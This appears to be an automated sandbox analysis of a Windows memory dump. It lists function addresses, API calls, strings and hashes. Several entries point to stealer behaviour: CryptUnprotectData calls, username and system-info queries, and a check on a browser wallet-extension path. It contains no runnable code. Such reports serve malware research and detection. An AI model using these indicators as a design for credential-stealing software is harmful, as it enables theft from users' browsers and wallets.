Instruction ID: 3f4a16f55fa8b7f98a17343bfadde7c9632cb0f24e1314f490cf1078d33f6b1c
Opcode Fuzzy Hash: d68266206670853559c239951daa7b59a10b5375985d87069325e1beb12e9d2c
Instruction Fuzzy Hash: C901F531202A159BEB28AF26DC14BEB3756AB91764F07C53FAC19DA290C738DC00C649

Uniqueness

Uniqueness Score: -1.00%

Function 004651E8, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004651EF

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Part of subcall function 00467CC1: std::exception::exception.LIBCMT ref: 00467D10
Part of subcall function 00467CC1: std::exception::exception.LIBCMT ref: 00467D2A
Part of subcall function 00467CC1: __CxxThrowException@8.LIBCMT ref: 00467D3B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
String ID:
API String ID: 2311266369-0
Opcode ID: 8578e4f6b0f891c528b6f7629ab4abcd6bc8009f20210a181c52f39c6f193ed6
Instruction ID: 840cbc6cc2710e8c2a1c1e2bcf6a8c5d0816eb4c63f0b73919a2be2fba52e2ad
Opcode Fuzzy Hash: 8578e4f6b0f891c528b6f7629ab4abcd6bc8009f20210a181c52f39c6f193ed6
Instruction Fuzzy Hash: 5501D6706046119BDF157F66992265E3A50AF40318F00815FB9155B3D2EF7C8D019A9F

Uniqueness

Uniqueness Score: -1.00%

Function 00467C4A, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: ee123ca314030bff14ba191e18914ed3c2a5c27ca24ba2e47a51c4dd00281e90
Instruction ID: f64f08467d76b9f299a675a3c80a90701c10917d95d6ec6429e5c1a6e3ed8435
Opcode Fuzzy Hash: ee123ca314030bff14ba191e18914ed3c2a5c27ca24ba2e47a51c4dd00281e90
Instruction Fuzzy Hash: 33F0A4319046689ADF112FA5DC01B9B3B949F5173CF14024BF938562D1F7BD8490DBAB

Uniqueness

Uniqueness Score: -1.00%

Function 004110B8, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004110BF

Part of subcall function 0040FDEA: std::locale::facet::_Incref.LIBCPMT ref: 0040FDFD

Part of subcall function 00410E91: __EH_prolog3.LIBCMT ref: 00410E98
Part of subcall function 00410E91: std::_Lockit::_Lockit.LIBCPMT ref: 00410EA2
Part of subcall function 00410E91: int.LIBCPMT ref: 00410EB9
Part of subcall function 00410E91: std::locale::_Getfacet.LIBCPMT ref: 00410EC2

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3$GetfacetIncrefLockitLockit::_std::_std::locale::_std::locale::facet::_
String ID:
API String ID: 199253227-0
Opcode ID: ae2f4df0d8604804da0774eaefcdf2f12641d97f2a69c8496de3075059ea371b
Instruction ID: b540ab02654e72e620fc268284bd186115c4a03f69c9f5fecdcc291c23764ef7
Opcode Fuzzy Hash: ae2f4df0d8604804da0774eaefcdf2f12641d97f2a69c8496de3075059ea371b
Instruction Fuzzy Hash: 50F0BE31600208ABCF15BB72CC16BEE73596F08708F00042FBA00A61E2EFBDCE958759

Uniqueness

Uniqueness Score: -1.00%

Function 0045F3B7, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0045F3EC

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c6907cd4de3e453768d3bcc2f7d0c4fd10da72fffc908c6f02f3a07c64c4c03e
Instruction ID: 059437bc8a41031ed9d61808184c1310e00730ced1c43a42cccf6b600875dc7a
Opcode Fuzzy Hash: c6907cd4de3e453768d3bcc2f7d0c4fd10da72fffc908c6f02f3a07c64c4c03e
Instruction Fuzzy Hash: 3FF0FF715102198BDB30DFA8DC45BDDB7F8BB04309F10852ED459E7241DFB866488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00464555, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 520a541090977386c38b358fa909f159a82519fb23c59b01b47a66ede2f65412
Instruction ID: bcd982347e5388f5f6cf48e1354f5e374aaa2308a4f9e54cfd126d45015da817
Opcode Fuzzy Hash: 520a541090977386c38b358fa909f159a82519fb23c59b01b47a66ede2f65412
Instruction Fuzzy Hash: 22F03AB0505200BFDF08CF14C644A363BA6ABD5308F34849EE2064E202E736D843DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD8C, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

CreateDirectoryA.KERNEL32(?,00000000), ref: 0040CDBE

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectoryH_prolog3
String ID:
API String ID: 517817506-0
Opcode ID: f548e273158eca03b5a7778d9aeb1e25a7e8851f9d60b96940b9276537ab3f53
Instruction ID: 4df2910af8312be61e3f43843f9077bd8910c3830de8634208a0d3521147f49e
Opcode Fuzzy Hash: f548e273158eca03b5a7778d9aeb1e25a7e8851f9d60b96940b9276537ab3f53
Instruction Fuzzy Hash: BBF01270910208EBEF04DFE5DD46FDD7778EB18704F40043AE501B71D1E6B8A9048B69

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00402CEF

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 77041dbd62c10e86c4107eaf2cd29430cd003063fd119c6f3f1506e3b97cec5c
Instruction ID: 292a41eaf27b36e1e42078ddedb39221cc99272948184a213b99a79d9ffafcda
Opcode Fuzzy Hash: 77041dbd62c10e86c4107eaf2cd29430cd003063fd119c6f3f1506e3b97cec5c
Instruction Fuzzy Hash: 31E02BB200D7416AE3305E099948B07FBE8FF81718F14091FE481136C2D7B9584892BA

Uniqueness

Uniqueness Score: -1.00%

Function 0046E866, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__flsbuf.LIBCMT ref: 0046E887

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction ID: 04766f330c7d4fb9599b8ce81bb9ddcfb2d387c2a4500ac8c3ccf6a697c258ef
Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction Fuzzy Hash: B2E0DF744001008ECB281B26C4452327BE0EF01769F3886CFDA808B1E3E33E8443EB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403570, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 004035A6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 660509fda3c089903a01d58005a256b5f3c6fddca4c5480059c3fac021dc877d
Instruction ID: 7c4f97ebe30a0e40352ab895cc7624637cca130e60e00242950d131df698fd88
Opcode Fuzzy Hash: 660509fda3c089903a01d58005a256b5f3c6fddca4c5480059c3fac021dc877d
Instruction Fuzzy Hash: 57E052B0E0420D9BCB44DFA8D5456DEBAF4BF08304F00856EE409F7340E77496458B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E194, Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E1B1

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: cb823118e3f37e45c56de36a165aef6196477bfbdc35ace4ffb649adea5dbb97
Instruction ID: 2e2102e6d6d31b4ac8ab59c5f4979c509e8b141e586ac1e3b2825a56b5a0c551
Opcode Fuzzy Hash: cb823118e3f37e45c56de36a165aef6196477bfbdc35ace4ffb649adea5dbb97
Instruction Fuzzy Hash: 8CD0A73B90D7207AC5112541BC01B8B7B518F80774F14441AFA0455151D635485043CE

Uniqueness

Uniqueness Score: -1.00%

Function 004602E7, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,0040FCF1,?,0000001A,?,?,?,?,0049B0CC,00000000), ref: 00460301

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 8abd0d4a1aaaa8ce3704efc2628216932a0bc47a49807621a46e2fe4f5f1af93
Instruction ID: a1cfc258ace85268705f1e073b6c37177d7097cd07717b35597a93cc5ec55387
Opcode Fuzzy Hash: 8abd0d4a1aaaa8ce3704efc2628216932a0bc47a49807621a46e2fe4f5f1af93
Instruction Fuzzy Hash: 35D0C975205201BEA2845B75DC06E7BBBADEBC8610F11C82DB585C21A0DA30E8508B32

Uniqueness

Uniqueness Score: -1.00%

Function 0045E933, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0045E941

Part of subcall function 004621BC: __EH_prolog3_GS.LIBCMT ref: 004621C6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_InfoSystem
String ID:
API String ID: 2966166590-0
Opcode ID: 8b3fce1c67cd043143d20ce2bb38d19c90e506d80b50fb330ef638994a37111b
Instruction ID: 19387f219a3731ead70dc757997e5d2b7c80c02b5afc36ffe5bb65784f588ce8
Opcode Fuzzy Hash: 8b3fce1c67cd043143d20ce2bb38d19c90e506d80b50fb330ef638994a37111b
Instruction Fuzzy Hash: 9DD09E7180410EBBCF00EFE5D849EDDBB78AB19749F008019E601A6160E775D659CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0046007D, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,0040D0AC,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000010,00000001,00000000), ref: 00460081

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8515690202dd3f1e22270338427d5464750e4f46b865814bcb5fa175a2607fae
Instruction ID: a28a42821ee8407f29391703c1332d8ae434a88f6e19e1b5ffd39e3bc6eb5705
Opcode Fuzzy Hash: 8515690202dd3f1e22270338427d5464750e4f46b865814bcb5fa175a2607fae
Instruction Fuzzy Hash: FAC08C32025040895A0006386D0822B6A429B91727F506E32E2A6C00E0FB288812620A

Uniqueness

Uniqueness Score: -1.00%

Function 0046009A, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00405B9D,00000000,?,?,?,?,\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT,00000042,?,?,?,?,?,?,00000018), ref: 0046009E

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: aa2c18b0a177d23ae1fe41068b7e441dcbd1d5b1c86a858b99ecbdc31d8dbd05
Instruction ID: 1843a84c1d069ec1dfa23bc67e8ab56e4033e777740a678c8a50fd081140884d
Opcode Fuzzy Hash: aa2c18b0a177d23ae1fe41068b7e441dcbd1d5b1c86a858b99ecbdc31d8dbd05
Instruction Fuzzy Hash: 6DC08C300152006D56011634BC0862B25909B52326F108E32E0A6C02E1FB368C92A10B

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC81, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,0040FD2B,?,?,?,?,?,0049B0CC,00000000), ref: 0040FC85

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e4b5d0219a920b81702b9cb40a785678cf315e8f7c6d42b05232d98bc6d69701
Instruction ID: 2826b96ae538d60d6299356c6ab427591acdbf3dbfd1728cf757918122b7f824
Opcode Fuzzy Hash: e4b5d0219a920b81702b9cb40a785678cf315e8f7c6d42b05232d98bc6d69701
Instruction Fuzzy Hash: 4EC04C7052A55459EA201E349D0A01B2691AA83627F940E75E8A9D19E4D7348D5A7504

Uniqueness

Uniqueness Score: -1.00%

Function 00468526, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00468533

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 466fd781385ece6d26b5ad95310f91e1450fb2d06d7fe000b64fecd3ef7189a8
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 83C09B7254010C77CF111943DC02E553F1997C1764F044015FB1C19161BD77D561D599

Uniqueness

Uniqueness Score: -1.00%

Function 004695EE, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 004695FB

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: c73aeb522fd294d6785c845a98384fa68a79a6f6b3180c4d0583a3fa226b76ee
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: F2C09B7344010C77CF111D43EC02E453F1D97D0764F448011FB1D19161F577D96196C9

Uniqueness

Uniqueness Score: -1.00%

Function 00401016, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00401025

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: a16e5b16714a1448422f66c129117e691444f1ff8e53e8e7b1cf012d2f1c0baa
Instruction ID: 5549ee678ecdc109923b726f2ef86f730a44a939511cc6300ebf448b160a6775
Opcode Fuzzy Hash: a16e5b16714a1448422f66c129117e691444f1ff8e53e8e7b1cf012d2f1c0baa
Instruction Fuzzy Hash: BB01A736304286ABCB01CF6DD8C49A6BFD9EF5A304B048065FD84CB312D571D908C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0045FFED, Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,004115DE,?,?), ref: 00460005

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: b71ae343ab975d2989b4f4db368fa8c50d4811b8bdc7eb78032efafd36867071
Instruction ID: 4bd8ac2cc3887550dd3d539f9eb65bd25c9e707104c173d2c474ab704532a428
Opcode Fuzzy Hash: b71ae343ab975d2989b4f4db368fa8c50d4811b8bdc7eb78032efafd36867071
Instruction Fuzzy Hash: F6E09B356056514B83224E1CA80472BF7979FD5F11F19855FDD9497318E635CC014796

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040E9D0, Relevance: 7.6, APIs: 5, Instructions: 98stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040EA10
CryptStringToBinaryA.CRYPT32(?,?,00000001,?,?,00000000,00000000), ref: 0040EA34
_memmove.LIBCMT ref: 0040EA8E
lstrcatA.KERNEL32(004866C4,004866C4), ref: 0040EAA4
lstrcatA.KERNEL32(004866C4,004866C4), ref: 0040EAB6

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcat$BinaryCryptString_memmove_memset
String ID:
API String ID: 3096129145-0
Opcode ID: be5abfd844e63ed34ba43aa0a8558c58b669c02ea89472c135ac5c946b25db83
Instruction ID: 26b0baabfd7ed76ddab585b5af8e3c419a642a735d219d93e9c0511fef25c445
Opcode Fuzzy Hash: be5abfd844e63ed34ba43aa0a8558c58b669c02ea89472c135ac5c946b25db83
Instruction Fuzzy Hash: 0C312D71900219AFDB10DFA6DC889EEBBB9FF19304B04047AE909E7241EB345919CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECE2, Relevance: 7.6, APIs: 5, Instructions: 50encryptionCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040ECEF

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

_memmove.LIBCMT ref: 0040ECFA
_malloc.LIBCMT ref: 0040ED06
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED1F
_memmove.LIBCMT ref: 0040ED35

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 2315474888-0
Opcode ID: 5d935c685e70d0886a72fa5ceb9dfcaafcf9c7f92a8e8373e3ca3b1289066e1c
Instruction ID: 06357cf3dad6ef56d5bc5cf757835289de7c2cb5893c122ca13cba441687c722
Opcode Fuzzy Hash: 5d935c685e70d0886a72fa5ceb9dfcaafcf9c7f92a8e8373e3ca3b1289066e1c
Instruction Fuzzy Hash: 29F0A4B79051157BCB11ABEA8C45CEF7B7CEE91314B04087BF501A7241E674DA11C7BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB68, Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040EB88
LocalAlloc.KERNEL32(00000040,?), ref: 0040EB96
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040EBAC
LocalFree.KERNEL32(?), ref: 0040EBBB

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: ba2fd9fc75d61570d03fead47c776ccc8f2477d1c7571f4d301cb85602a3b09f
Instruction ID: 286e464d283cc7e6db70dcb5cd6fabf2829f37cb30117995f1f6ba1dc61d63ad
Opcode Fuzzy Hash: ba2fd9fc75d61570d03fead47c776ccc8f2477d1c7571f4d301cb85602a3b09f
Instruction Fuzzy Hash: DA012870101224BBDB219F57DC8CE8B7FB8EF4ABA0B104466F909A6250D2709A50DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E962, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E983
GetVersionExA.KERNEL32(?), ref: 0040E99C

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 630a03cfa351ca82e0eb45fb75b4b476b08a7a55b897fe50bcbface550743a92
Instruction ID: a5026e6e28ae449b84c2821484506ba216ab75e514caff06066bd32c3568e6aa
Opcode Fuzzy Hash: 630a03cfa351ca82e0eb45fb75b4b476b08a7a55b897fe50bcbface550743a92
Instruction Fuzzy Hash: B9F0B431A642199FDB14DFB4EC42FAD73B49B05704F1005BD910EE72C2EA34964C8F05

Uniqueness

Uniqueness Score: -1.00%

Function 00470464, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0046B69A), ref: 0047046C
__mtterm.LIBCMT ref: 00470478

Part of subcall function 00470143: DecodePointer.KERNEL32(00000007,004705DA,?,0046B69A), ref: 00470154
Part of subcall function 00470143: TlsFree.KERNEL32(0000001D,004705DA,?,0046B69A), ref: 0047016E
Part of subcall function 00470143: DeleteCriticalSection.KERNEL32(00000000,00000000,772FF3A0,?,004705DA,?,0046B69A), ref: 004728F6
Part of subcall function 00470143: _free.LIBCMT ref: 004728F9
Part of subcall function 00470143: DeleteCriticalSection.KERNEL32(0000001D,772FF3A0,?,004705DA,?,0046B69A), ref: 00472920

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0047048E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0047049B
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004704A8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004704B5
TlsAlloc.KERNEL32(?,0046B69A), ref: 00470505
TlsSetValue.KERNEL32(00000000,?,0046B69A), ref: 00470520
__init_pointers.LIBCMT ref: 0047052A
EncodePointer.KERNEL32(?,0046B69A), ref: 0047053B
EncodePointer.KERNEL32(?,0046B69A), ref: 00470548
EncodePointer.KERNEL32(?,0046B69A), ref: 00470555
EncodePointer.KERNEL32(?,0046B69A), ref: 00470562
DecodePointer.KERNEL32(Function_000702C7,?,0046B69A), ref: 00470583
__calloc_crt.LIBCMT ref: 00470598
DecodePointer.KERNEL32(00000000,?,0046B69A), ref: 004705B2
GetCurrentThreadId.KERNEL32 ref: 004705C4

Strings

FlsSetValue, xrefs: 0047049D
KERNEL32.DLL, xrefs: 00470467
FlsAlloc, xrefs: 00470488
FlsFree, xrefs: 004704AA
FlsGetValue, xrefs: 00470490

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: bf80e413a73e2ed9339da5ddd42c98960932bea181f134a1a57730707299c739
Instruction ID: a6514c9f43803496a8cc65028fa9ea3a733dbab8ef7a352968fba5221639d0b5
Opcode Fuzzy Hash: bf80e413a73e2ed9339da5ddd42c98960932bea181f134a1a57730707299c739
Instruction Fuzzy Hash: 49316D31941212EADB21EF76ED4C6DA3EA4EB647607144A3FF418922B0FB798540CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00430E75, Relevance: 35.2, APIs: 4, Strings: 16, Instructions: 177COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00430F61
__fprintf_l.LIBCMT ref: 00430F7C
__fprintf_l.LIBCMT ref: 00430FF5
__fprintf_l.LIBCMT ref: 0043107D

Strings

VIRTUAL TABLE INDEX %d:%s, xrefs: 00431075
SEARCH, xrefs: 00430F2B
(rowid>? AND rowid<?), xrefs: 0043102A
(rowid>?), xrefs: 00431031
(rowid<?), xrefs: 0043103B
USING , xrefs: 00430FDA
INDEX %s, xrefs: 00430FD3
USING INTEGER PRIMARY KEY , xrefs: 00431040
SUBQUERY %d, xrefs: 00430F4D
SCAN, xrefs: 00430F32
TABLE %s, xrefs: 00430F57
PRIMARY KEY, xrefs: 00430FAB
AUTOMATIC COVERING INDEX, xrefs: 00430FBD
AS %s, xrefs: 00430F71
COVERING INDEX %s, xrefs: 00430FCA
(rowid=?), xrefs: 0043101D

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fprintf_l
String ID: AS %s$ SUBQUERY %d$ TABLE %s$ USING $ USING INTEGER PRIMARY KEY $ VIRTUAL TABLE INDEX %d:%s$(rowid<?)$(rowid=?)$(rowid>? AND rowid<?)$(rowid>?)$AUTOMATIC COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH
API String ID: 3906573944-2785157390
Opcode ID: 744d1a8326ed9dd533f66ed939e211f4ccf5d0b261ff00a6339aa4be1224c8d4
Instruction ID: 2ac2a74fdcf1ecad5bd176fa7bcad111e8c6e21f3d912d16b2ea870c87b533c2
Opcode Fuzzy Hash: 744d1a8326ed9dd533f66ed939e211f4ccf5d0b261ff00a6339aa4be1224c8d4
Instruction Fuzzy Hash: 2161DD31D00309AADB24DF96C845BEEB7F4AF08314F14A51BE90467292D77C9989CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00428C6B, Relevance: 33.7, APIs: 7, Strings: 12, Instructions: 497COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00428D46
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428D80
_strncmp.LIBCMT ref: 0042900B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004290AA
__allrem.LIBCMT ref: 004290B5
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429124

Part of subcall function 00428B20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00428BC4
Part of subcall function 00428B20: __localtime64_s.LIBCMT ref: 00428BE7

Strings

day, xrefs: 00428E42, 00429227
start of , xrefs: 004291B5
second, xrefs: 00428EAD
hour, xrefs: 00428E6A
year, xrefs: 00428F45, 00429201
minute, xrefs: 00428E91
localtime, xrefs: 00428FBB
month, xrefs: 00428ECE, 004291DD
-, xrefs: 00428D98
unixepoch, xrefs: 004290F9
utc, xrefs: 0042914B
weekday , xrefs: 00429005

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem__localtime64_s_memset_strncmp
String ID: -$day$hour$localtime$minute$month$second$start of $unixepoch$utc$weekday $year
API String ID: 3149664924-3507268942
Opcode ID: fc68769db0c7042eef4e25d12973c8960b6577520ea3064413d6bb197fd7adc2
Instruction ID: d273cd2a9407dcd4b77d844465f12a27522f4c234fbaceace84397881f1682ef
Opcode Fuzzy Hash: fc68769db0c7042eef4e25d12973c8960b6577520ea3064413d6bb197fd7adc2
Instruction Fuzzy Hash: DB023772E01228DBDF109F65E8407EDBBB5AF54324F65449FE804BB282DB788C45876D

Uniqueness

Uniqueness Score: -1.00%

Function 004440D1, Relevance: 28.5, APIs: 2, Strings: 14, Instructions: 473COMMON

Download Yara Rule

Strings

Rowid %lld out of order (max larger than parent min of %lld), xrefs: 004443BB
Page %d: , xrefs: 00444129, 0044436A
Fragmentation of %d bytes reported as %d on page %d, xrefs: 004445EE
Multiple uses for byte %d of page %d, xrefs: 004445CF
Rowid %lld out of order (min less than parent min of %lld), xrefs: 004443DE
Rowid %lld out of order (max larger than parent max of %lld), xrefs: 0044440C
Child page depth differs, xrefs: 004442EC
unable to get the page. error code=%d, xrefs: 0044413F
On tree page %d cell %d: , xrefs: 004441A9
Rowid %lld out of order (min less than parent max of %lld), xrefs: 00444449
On page %d at right child: , xrefs: 00444330
btreeInitPage() returns error code %d, xrefs: 00444168
Corruption detected in cell %d on page %d, xrefs: 00444535
Rowid %lld out of order (previous was %lld), xrefs: 0044420F

Memory Dump Source

